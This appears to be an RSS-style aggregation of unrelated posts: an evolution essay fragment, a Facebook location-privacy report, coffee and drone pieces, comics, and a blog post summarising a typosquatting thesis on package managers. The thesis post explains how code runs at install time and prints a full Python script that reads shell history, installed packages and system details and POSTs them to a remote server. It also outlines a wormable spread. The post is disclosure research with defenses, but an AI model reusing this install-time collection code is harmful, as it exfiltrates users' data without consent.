This meme, methinks, forms the true bone of contention and the true obstacle to progress. It’s one of the odd beauties of this whole mess that Dawkins himself coined the term meme, and did so in The Selfish Gene. He defined it as a big idea that competes for dominance in a tough environment — an idea that, like a catchy tune or a good joke, ‘propagates itself by leaping from brain to brain’. The selfish-gene meme has done just that. It has made of evolutionary theory a vehicle for its replication. The selfish gene has become a selfish meme.

If you’re West-Eberhard or of like mind, what are you to replace it with? The slave-ish gene? Not likely to leap from brain to brain. The co-operative gene? Dawkins himself considered this but rejected it and I agree that it lacks sufficient bling. And as West-Eberhard notes, any phrase with ‘gene’ in it still encourages a focus on single genes. And ‘evolution is not about single genes,’ she says. ‘It’s about genes working together.’

Perhaps better then to speak not of genes but the genome — all your genes together. And not the genome as a unitary actor, but the genome in conversation with itself, with other genomes, and with the outside environment. If grasshoppers becoming locusts, sweet bees becoming killers, and genetic assimilation are to be believed it’s those conversations that define the organism and drive the evolution of new traits and species. It’s not a selfish gene or a solitary genome. It’s a social genome.

What would Mendel think of that? Let’s play this out.

Mendel actually studied bees as a boy, and he studied them again for a couple years after he finished his pea-plant studies. In crossbreeding two species at the monastery, he accidentally created a strain of bees so vicious that he couldn’t work with them. If he’d had an RNA sequencer, he, like Gene Robinson, could have studied how much of the bees’ aggression rose from changes in the genetic code or how much rose from gene expression in response to the environment. If he had, the father of genetics might have seen right then that traits change and species evolve not just when genes change, when a creature and its genome and hive mates respond to an environment. He might have discovered not just genes, but genetic assimilation. Not the selfish gene, but the social genome.

Alas, no such equipment existed, and Mendel worked in a monastery in the middle of town. His vicious bees promised not a research opportunity but trouble. So he killed them. He would found genetics not through a complex story told by morphing bees, but through a simple tale told by one pea wrinkled and one pea smooth.

This is a revised version of the essay ‘Die, selfish gene, die’. It replaced the original on 13 December, 2013. Reader comments posted before that date were responding to the original version. A post at the author’s blog explains the revision and includes some other resources.

Topics: Biology Evolution Genetics

30 Jun 19:00

Divertidas maneiras de fazer café no Instagram

by Mexido de Ideias

Divertidas maneiras de fazer café no Instagram por Mexido de Ideias

Os tipos de café são muitos, e os métodos de preparo também. Mas a forma de preparar a bebida e as receitas com o grão são infinitas – desde as tradicionais até as mais inusitadas. Nessa segunda categoria entra o australiano Zac Tucket, dono do Instagram Six Impossible Things.

fazer-cafe-instagram

Embaixo d’água, na postura de yoga, de ponta-cabeça, fazendo malabarismo… Nem as leis da gravidade impedem o ex-barista (e hoje podólogo) de declarar o amor pelo café e pela fotografia.  O nome do canal – seis coisas impossíveis, em português – foi inspirado no livro Alice Através do Espelho, de Lewis Carroll. “Esse poderia ser um bom nome para uma cafeteria”, brincou o australiano em entrevista ao site Sprudge.

Ele começou a publicar as imagens no Instagram como forma de promover métodos de preparo artesanais, além de compartilhar o interesse por café. “Isso me levou a conhecer pessoas incríveis e ter grandes oportunidades, mais do que jamais imaginaria. Hoje em dia meu trabalho é sobre viver um bom momento, sem me levar muito a sério”.

instagram-com-cafe

Tucket explica seu processo criativo como algo simples, sem grandes planejamentos. “No banho, posso pensar: ‘Será que alguém já tomou banho com café coado?’. Observando meu gato agindo de forma estranha, penso: ‘OK, mas vamos ver se você consegue fazer café, meu garoto’. E depois não consigo ir embora com o pensamento sem ter pelo menos tentado realizá-lo.”

Ficou curioso para conferir mais do fascinante trabalho desse australiano apaixonado por café? É só seguir o Six Impossible Things clicando aqui.

Por: Marina Oliveira

Fotos: @six_impossiblethings

Divertidas maneiras de fazer café no Instagram por Mexido de Ideias

27 Jun 18:47

Facebook is using your phone’s location to suggest new friends—which could be a privacy disaster

by Kashmir Hill
FACEBOOK_FRIENDS_HEADER_1A

Erendira Mancias/FUSION

Facebook’s ability to discern with creepy accuracy the “people we may know” has surprised, delighted, and horrified its users for years. While the magic sauce behind friend suggestions has always been a bit mysterious, it now includes some potentially unsettling information. Thanks to tracking the location of users’ smartphones, the social network may suggest you friend people you’ve shared a GPS data point with, meaning your friend suggestions could include someone whose face you know, but whose name you didn’t until Facebook offered it up to you.

Last week, I met a man who suspected Facebook had tracked his location to figure out who he was meeting with. He was a dad who had recently attended a gathering for suicidal teens. The next morning, he told me, he opened Facebook to find that one of the anonymous parents at the gathering popped up as a “person you may know.”

The two parents hadn’t exchanged contact information (one way Facebook suggests friends is to look at your phone contacts). The only connection the two appeared to have was being in the same place at the same time, and thus their smartphones being in the same room. The man immediately checked the privacy settings on his phone and saw that Facebook “always” had access to his location. He immediately changed it to “never.” (He also did not want to reveal his identity for this story.)

It turns out his suspicions were correct.

People You May Know are people on Facebook that you might know,” a Facebook spokesperson said. “We show you people based on mutual friends, work and education information, networks you’re part of, contacts you’ve imported and many other factors.”

One of those factors is smartphone location. A Facebook spokesperson said though that shared location alone would not result in a friend suggestion, saying that the two parents must have had something else in common, such as overlapping networks.

“Location information by itself doesn’t indicate that two people might be friends,” said the Facebook spokesperson. “That’s why location is only one of the factors we use to suggest people you may know.”

Facebook has gotten more aggressive in its use of smartphone location data in the last year, tracking which stores you go to in order to tell advertisers if their online ads worked and letting advertisers use your phone’s location to geotarget you with ads. But until now, most people didn’t realize that Facebook was also tracking their phone’s location to suggest friends to them.

The implications of this are far-reaching. There are situations in which this could be incredibly useful. It means you could finally become Facebook friends with “Karen” from yoga class. Or if you meet awesome new people at a party, but forget to exchange numbers, last names, or Snapchat handles, Facebook could make new friendships happen by surfacing those party-goers to you. Great! Those are best case scenarios.

But there are plenty of scenarios in which Facebook casually connecting you with people because your phones were in the same place at the same time could end disastrously. Imagine going to an Alcoholics Anonymous meeting, and then getting “Friend” suggestions the next day for members of the group along with their full names and profile information. Or getting hit on at the bar by a guy that gives you the creeps, giving him the cold shoulder and no information about yourself, but later getting a ‘Friend Request’ from him. Or visiting an abortion clinic and discovering that one of the abortion protestors outside was offered up your identity by Facebook.

Last year, Motherboard asked how Facebook was figuring out who people were going out on Tinder dates with. The report was ultimately inconclusive as experts said that data from Tinder doesn’t flow back to Facebook, but it may well have been location-based.

“Using location data this way is dangerous,” said Woodrow Hartzog, a law professor at Samford University, via email. “People need to keep their visits to places like doctor’s offices, rehab, and support centers discreet. Once Facebook users realize that the ‘People You May Know’ are the ‘People That Go To the Same Places You Do,’ this feature will inevitably start outing people’s intimate information without their knowledge.”

Most Facebook users who have the app on their phone with location access granted likely don’t realize this could happen. It’s not mentioned on Facebook’s help page about how “People You May Know” works.

“This is the kind of thing that people should be given explicit and multiple warnings about,” said Hartzog. “They should also be asked to affirmatively turn on the feature before their whereabouts are used to get them friends. Geolocation data is far more sensitive than most of the kinds of information people probably assume are used to suggest friends, such as alma mater and mutual friends.”

For now, if it’s troubling to you, the way you can prevent it is to turn off Facebook’s access to your location. It’s in your phone’s privacy settings.

The setting if you want to deprive Facebook of the ability to monetize your movements

The setting if you want to deprive Facebook of the ability to track your movements

* Updated to add additional comment from Facebook.

21 May 10:08

Byzantine - BigFly

"Byzantine"
Balade en drone à l'intérieur d'une église Neo Byzantine.

One Drone, one Neo Byzantine church.
A solemn place which the sun highlights every day. Go to its discovery.

Production BigFly

Festival :
- Meilleur Film catégorie Architecture - Drone Film & Photo festival (Belgique) - 2016
- 2ème Prix du Jury - Drone Festival (Pologne) - 2016
- Sélection Officielle - Los Angeles CineFest (USA) - 2016
- Sélection Officielle - Viva Film Festival (Bosnie-Herzégovine) - 2016
- Sélection Officielle - London Drone Film Festival (Angleterre) - 2016
- Sélection Officielle - Festival du Film Professionnel de Drone (Nantes) - 2016

___________________________________________________

Images Aériennes par Drone & Productions de Films
Cinéma / Publicité / Documentaire / Télévision

bigfly.fr

contact@bigfly.fr

facebook.com/bigfly.fr/

2016

Cast: BigFly.fr, Joris Favraud and Guillaume JUIN

Tags: drone, cinema, bigfly, aerial, cinematography, gryphon, église, church, interior, drone video, byzantine and byzantin

09 Jun 20:30

Watch This Fascinatingly Incoherent Short Film Written By a Neural Network

by James Whitbrook on io9, shared by Riley MacLeod to Kotaku

We’re getting A.I. to do all sorts of weird and wonderful things these days, whether its on the small-scale of text prediction or captioning photos , to driving cars for us and beating people at board games . But what if we turned a neural network into a science fiction writer? The answer is that you’d get a complete mess in return.

Read more...

13 Jun 09:00

Just returned from vacation; git pull

by sharhalakis

by paran0id

10 Jun 09:00

Waiting the late night deploy to finish

by sharhalakis

by @uaiHebert

08 Jun 20:11

Typosquatting programming language package managers

by Nikolai Tschacher

Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address, since my mail server on this VPS is constantly down :/ tschachn [|[at]|] hu-berlin [[|dot|]] de

In this blog post I will show how to use the neat JavaScript library chart.js with the well-known Python web-framework Django. As a sample data set I will make use of my workout progress data between May 2016 and August 2016.

  • 17000 computers were forced to execute arbitrary code by typosquatting programming language packages/libraries
  • 50% of these installations were conducted with administrative rights
  • Even highly security aware institutions (.gov and .mil hosts) fell victim to this attack
  • a typosquatting attack becomes wormable by mining the command history data of hosts
  • some good defenses against typosquatting package managers might look like

The complete thesis can be downloaded as a PDF.

In the second part of 2015 and the early months of 2016, I worked on my bachelors thesis. In this thesis, I tried to attack programming language package managers such as Pythons PyPi, NodeJS Npmsjs.com and Rubys rubygems.org. The attack does not exploit a new technical vulnerability, it rather tries to trick people into installing packages that they not intended to run on their systems.

DNS Typosquatting

In the domain name system, typosquatting is a well known problem. Typosquatting is the malicious registering of a domain that is lexically similar to another, often highly frequented, website. Typosquatters would for instance register a domain named Gooogle.com instead of the well known Google.com. Then they hope that people mistype the website name in the browser and accidentally arrive on the wrong site. The misguided traffic is then often monetized either with advertisements or malicious attacks such as drive by downloads or exploit kits.

The Idea

While writing the thesis, I wondered whether the concept behind DNS typosquatting can be transfered to other use cases. By using the programming language Python for several years, I learned that the third-party package manager pip (a command line application) is used to install software libraries from Python’s community repository named PyPi. So the natural question is: How many users do commit typos when issuing an installation command in the terminal by using pip?

sudo pip install reqeusts

Because everybody can upload any package on PyPi, it is possible to create packages which are typo versions of popular packages that are prone to be mistyped. And if somebody unintentionally installs such a package, the next question comes intuitively: Is it possible to run arbitrary code and take over the computer during the installation process of a package?

The Attack

So basically we create a fake package that has a similar name as a famous package on PyPi, Npmjs.com or rubygems.org. For example we could upload a package named reqeusts instead of the famous requests module. I created such typo package names in three different ways:

  1. Creative typo names like coffe-script instead of coffee-script. Often only humans can create creative typo names, because its creation process requires an intuitive understanding of what grammatical mistake is easy to make with the origin name.

  2. Stdlib typos or core package names like urllib2. Stdlib typos are package names that do exist in the core of the language but haven't registered in the third party package manager yet.

  3. Algorithmically determined typo names like req7est instead of request. Algorithmically typo candidates are suggestions from algorithms like the Levenshtein distance.

All in all, I created over 200 such packages and equipped them with a small program and uploaded them over the course of several months. The idea is to add some code to the packages that is executed whenever the package is downloaded with the installing user rights.

The following points need to be considered when attacking a package manager. The first two items of the list need to be fulfilled in order for the package repository to be vulnerable for typosquatting attacks.

  1. The possibility of registering any package name and uploading code without supervision.
  2. The feasibility to achieve code execution upon package installation on the host system.
  3. Accessibility and presence of good documentation for uploading and distributing packages on the package repositories.
  4. Difficulty in quickly learning the target programming language.

The reader might now ask himself, whether it is really that easy for a installing package to execute own code?

Code Execution for Installed Python Packages

In Python, each package that is publicly registered, needs to have a setup.py file that contains package meta data such as names, description and fixtures belonging to the package. Whenever a user installs a package from the PyPi package repository, this setup.py is executed by a local Python interpreter. This means, that it is possible to hide code in the setup.py file that runs with the installing users rights.

Code Execution for Installed NodeJS Packages

NodeJS and its package manager, npm, provide various hooks on specific events to execute code. There is also a preinstall option that can be set in the package.json file, that provides options and metadata for a published NodeJS package. It is favorable to write this preinstall script also in Javascript and execute it with the node binary, because node is guaranteed to be installed on the target system, when npm is used to install third party packages.

Code Execution for Installed Ruby Packages

Achieving code execution with Ruby was slightly trickier. There is no official way (like in Node.js) or easy method (like in Python’s setup.py file) to execute code upon installing packages with the Ruby package manager named gem. However, code execution was achieved by creating an empty native Ruby extension and placing the notification code in a Ruby extension configuration file named extconf.rb, which is interpreted during the pseudo build process.

The Notification Program

Now that we achieved code execution upon installation, it is time to show the program that was executed when the user installed such a typo package. The Python script below collects some non-personal host information and sends it to a University virtual private server that was setup beforehand. An equivalent program was developed for Ruby and NodeJS. I called this program Notification Program, because it notifies me whenever a user committed a typo and installed one of my typo packages. The data collected contains the IP address, the operating system, the user rights and a timestamp of the installation.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Notification program used in the typo squatting
bachelor thesis for the python package index.

Created in autumn 2015.

Copyright by Nikolai Tschacher
"""

import os
import ctypes
import sys
import platform
import subprocess

debug = False

# we are using Python3
if sys.version_info[0] == 3:
  import urllib.request
  from urllib.parse import urlencode

  GET = urllib.request.urlopen

  def python3POST(url, data={}, headers=None):
    """
    Returns the response of the POST request as string or
    False if the resource could not be accessed.
    """
    data = urllib.parse.urlencode(data).encode()
    request = urllib.request.Request(url, data)
    try:
      reponse = urllib.request.urlopen(request, timeout=15)
      cs = reponse.headers.get_content_charset()
      if cs:
        return reponse.read().decode(cs)
      else:
        return reponse.read().decode('utf-8')
    except urllib.error.HTTPError as he:
      # try again if some 400 or 500 error was received
      return ''
    except Exception as e:
      # everything else fails
      return False
  POST = python3POST
# we are using Python2
else:
  import urllib2
  from urllib import urlencode
  GET = urllib2.urlopen
  def python2POST(url, data={}, headers=None):
    """
    See python3POST
    """
    req = urllib2.Request(url, urlencode(data))
    try:
      response = urllib2.urlopen(req, timeout=15)
      return response.read()
    except urllib2.HTTPError as he:
      return ''
    except Exception as e:
      return False
  POST = python2POST


try:
  from subprocess import DEVNULL # py3k
except ImportError:
  DEVNULL = open(os.devnull, 'wb')


def get_command_history():
  if os.name == 'nt':
    # handle windows
    # http://serverfault.com/questions/95404/
    #is-there-a-global-persistent-cmd-history
    # apparently, there is no history in windows :(
    return ''

  elif os.name == 'posix':
    # handle linux and mac
    cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
    return os.popen(cmd.format(os.path.expanduser('~'))).read()


def get_hardware_info():
  if os.name == 'nt':
    # handle windows
    return platform.processor()

  elif os.name == 'posix':
    # handle linux and mac
    if sys.platform.startswith('linux'):
      try:
        hw_info = subprocess.check_output('lshw -short',
                   stderr=DEVNULL, shell=True)
      except:
        hw_info = ''

      if not hw_info:
        try:
          hw_info = subprocess.check_output('lspci',
                   stderr=DEVNULL, shell=True)
        except:
          hw_info = ''
        hw_info += '\n' +\
          os.popen('free -m').read().strip()

      return hw_info

    elif sys.platform == 'darwin':
      # According to https://developer.apple.com/library/
      # mac/documentation/Darwin/Reference/ManPages/
      # man8/system_profiler.8.html
      # no personal information is provided by detailLevel: mini
      return os.popen('system_profiler -detailLevel mini').read()


def get_all_installed_modules():
  # first try the default path
  pip_list = os.popen('pip list').read().strip()

  if pip_list:
    return pip_list
  else:
    if os.name == 'nt':
      paths = ('C:/Python27',
           'C:/Python34',
           'C:/Python26',
           'C:/Python33',
           'C:/Python35',
           'C:/Python',
           'C:/Python2',
           'C:/Python3')
      # try some paths that make sense to me
      for loc in paths:
        pip_location = os.path.join(loc, 'Scripts/pip.exe')
        if os.path.exists(pip_location):
          cmd = '{} list'.format(pip_location)
          try:
            pip_list = subprocess.check_output(cmd,
                   stderr=DEVNULL, shell=True)
          except:
            pip_list = ''
          if pip_list:
            return pip_list
  return ''


def notify_home(url, package_name, intended_package_name):
  host_os = platform.platform()
  try:
    admin_rights = bool(os.getuid() == 0)
  except AttributeError:
    try:
      ret = ctypes.windll.shell32.IsUserAnAdmin()
      admin_rights = bool(ret != 0)
    except:
      admin_rights = False

  if os.name != 'nt':
    try:
      pip_version = os.popen('pip --version').read()
    except:
      pip_version = ''
  else:
    pip_version = platform.python_version()

  url_data = {
    'p1': package_name,
    'p2': intended_package_name,
    'p3': 'pip',
    'p4': host_os,
    'p5': admin_rights,
    'p6': pip_version,
  }

  post_data = {
    'p7': get_command_history(),
    'p8': get_all_installed_modules(),
    'p9': get_hardware_info(),
  }

  url_data = urlencode(url_data)
  response = POST(url + url_data, post_data)

  if debug:
    print(response)

  print('')
  print("Warning!!! Maybe you made a typo in your installation\
   command or the module does only exist in the python stdlib?!")
  print("Did you want to install '{}'\
   instead of '{}'??!".format(intended_package_name, package_name))
  print('For more information, please\
   visit http://svs-repo.informatik.uni-hamburg.de/')


def main():
  if debug:
    notify_home('http://localhost:8000/app/?',
             'pmba_basic', 'pmba_basic')
  else:
    notify_home('http://svs-repo.informatik.uni-hamburg.de/app/?',
                     'pmba_basic', 'pmba_basic')

if __name__ == '__main__':
  main()

Results

In two empirical phases, exactly 45334 HTTP requests by 17289 unique hosts (distinct IP addresses) were gathered. This means that 17289 distinct hosts executed the program above and sent the data to the webserver which was analyzed in the thesis. The number of HTTP requests is for various reasons higher than the number of distinct IP addresses. The main reason is that pip executes the setup.py file twice on installation. Don't ask me why.

Packages for three different package managers, PyPi (Python), rubygems.org (Ruby) and npmjs.com (Node.js – Javascript) were uploaded and distributed. Most installations were received from PyPi with 15221 unique installations measured by distinct IP addresses. Then rubygems.org follows with 1631 distinct installations. Npmjs.com with 525 total unique IP addresses counted, had the smallest number of installations.

At least 43.6% of the 17289 unique IP addresses executed the notification program with administrative rights. From the 19603 distinct interactions, 8614 machines used Linux as an operation system, 6174 used Windows and 4758 computers were running OS X. Only 57 hosts (or 0.29%) could not be mapped to one of these three major operating systems. These were mostly FreeBSD and Java operating systems (Or in rare instances, junk data that was submitted manually and thus not possible to parse).

Some statistical numbers for the uploaded packages and their installations:

  • 214 total different uploaded typo packages on three different package repositories
  • 92 average installations per package
  • The standard derivation of installations per package is 433 and thus relatively high
  • The most installed package (urllib2) received 3929 unique installations in almost 2 weeks (284 average installations per day)
  • The most installed package per day was bs4 with 366 unique daily installations on average
  • The least installed package had only one installation (Probably by a mirror or crawler)

The image below visualizes the installations over time. Each point shows the installations on a certain day. The upper plot shows the total number of unique installations on each single day. The light dashed line are the installations with administrative rights. The bottom plot splits up installations in two sets: From the top five installed packages (circles as markers) and the rest of all packages (squares as markers). Light sub-graphs show the administrative ratio.

Downloads over time

In the image below, a reverse lookup was conducted on the gathered IP addresses. The number of hosts for some interesting domains are shown.

Downloads over time

Making the attack wormable

The basic idea is to make the typosquatting attack wormable by mining typo candidates from the command line history of encountered hosts. The function get_command_history() in the Notification Program above

def get_command_history():
  if os.name == 'nt':
    # handle windows
    # http://serverfault.com/questions/95404/
    #is-there-a-global-persistent-cmd-history
    # apparently, there is no history in windows :(
    return ''

  elif os.name == 'posix':
    # handle linux and mac
    cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
    return os.popen(cmd.format(os.path.expanduser('~'))).read()

collects the command history involving a pip installation command. Then the package name of the commands are parsed and I looked for all real typos by comparing them to the list of all existing packages in the PyPi index. If the package name wasn't found there, we successfully mined a new typo name.

The analysis of 1454 distinct hosts, which sent the command history, reveals a concerning result: By mining the command history for typos, several new high class typo candidates, which promise large numbers of installations, have been located. Especially the module names git (misspelled in 90 distinct hosts), scikit (89 unique misspellings) and bs4 (31 hits) seem to be mistyped frequently among independent users. By registering them, lots of typo installations and thus code execution seem to be guaranteed. And the more new installations, the more new mined typo candidates. Worm like behavior.

Command history mining

Defenses against typo squatting

In short, read the thesis. If you are too lazy, do the following:

Prevent Direct Code Execution on Installations This one is easy. Make sure that the software that unpacks and installs a third party package (pip or npm) does not allow the execution of code that originates from the package itself. Only when the user explicitly loads the package, the library code should be executed.

Generate a List of Potential Typo Candidates Generate Levenshtein distance candidates for the most downloaded N packages of the repository and alarm administrators on registration of such a candidate.

Analyze 404 logfiles and prevent registration of often shadow installed packages Whenever a user makes a typo by installing a package and the package is not registered yet, a 404 logfile entry on the repository server is created (because the install HTTP requests targets a non-existent resource). Parse these failed installations and prevent all such names that are shadow-installed more than a reasonable threshold per month.

Conclusion

If I would have had malicious intentions and if malware was distributed instead of the notification program which only send information to a university web server, then these 17289 unique hosts would be under my control. At least 43.6 % of hosts with administrative rights would have given me 8552 computers with complete access to the whole operating system API.

The results of this thesis showed that creating a botnet by exploiting typo errors from humans is perfectly possible. However, it is not easy to answer how much the cover of free research from the University covered and prevented a interruption of the empiric study by security researchers.

In the thesis itself, several powerful methods to defend against typo squatting attacks are discussed. Therefore they are not included in this blog post.

In the thesis, the well known programming languages Python, NodeJS and Ruby were attacked. All their package managers were found to be vulnerable to typosquatting attacks. It is of great importance to find out whether other programming languages (such as .NET or Go) suffer from the same problems.

08 May 21:25

Check Out This Incredible Bond-Inspired Credit Sequence For The Empire Strikes Back

by Andrew Liptak on io9, shared by Gergo Vas to Kotaku
Check Out This Incredible Bond-Inspired Credit Sequence For The Empire Strikes Back

The opening crawl that opens up every Star Wars film is one of cinema’s most iconic moments, and will never change, but what happens when you take the stylings of a James Bond film and give it a try? Magic.

Read more...

27 Mar 13:49

Don’t Believe Winter’s Lies [Comic]

by Geeks are Sexy
24 Mar 18:00

Copyright Warnings [Comic]

by Geeks are Sexy
11 Apr 01:01

“Sysadmin grants sudo privileges to developer on production web...



“Sysadmin grants sudo privileges to developer on production web server” - Andrea del Verrocchio and Leonardo da Vinci, 1425-1475, Oil on wood

(collaboration from Joseph )

10 Mar 10:00

Did you hear that they are gonna give us a raise? Whaaat?

by sharhalakis

by @uaiHebert

23 Feb 15:12

Spellrazor Is “A Haunted Videogame From 1981″

by Graham Smith

Spellrazor [official site] is a “creepy resurrection of a semi-mythical game considered lost back in 1981,” according to its Game Jolt page. It’s also a top-down shmup with 27 weapons, each one assigned to a different button on your keyboard, and a console where you can access the fictional story of the game’s own development. It’s also also free in its current alpha state and worth your time.

… [visit site to read more]

01 Mar 20:12

Back to the Future Prequel Trailer: 1.21 Gigawatts

02 Feb 12:34

1608 – Sobre legalizar a maconha

by Carlos Ruas

2773

08 Jan 15:22

Frustrated Pirates Prophesise The Death Of Game Piracy

by Alec Meer

And on that bombshell

My eyebrow’s raised so high that it’s knocking plaster off the ceiling, but it’s worth sharing this oddity as a talking point if nothing else. It seems Just Cause 3 [official site]’s DRM is still presenting stiff competition to crackers over a month on from release, prompting one pirate collective to predict that we are in the game piracy end times. “According to current trends in the development of encryption technology, in two years time I’m afraid there will be no free games to play in the world.”

Obviously that’s garbage, both because people willingly make tons of free games and because many paid games choose not to include DRM at all, but maybe DRM really has become a new force to be reckoned with.
… [visit site to read more]

06 Jan 10:00

Fixing a bug during the deploy

by sharhalakis

by @uaiHebert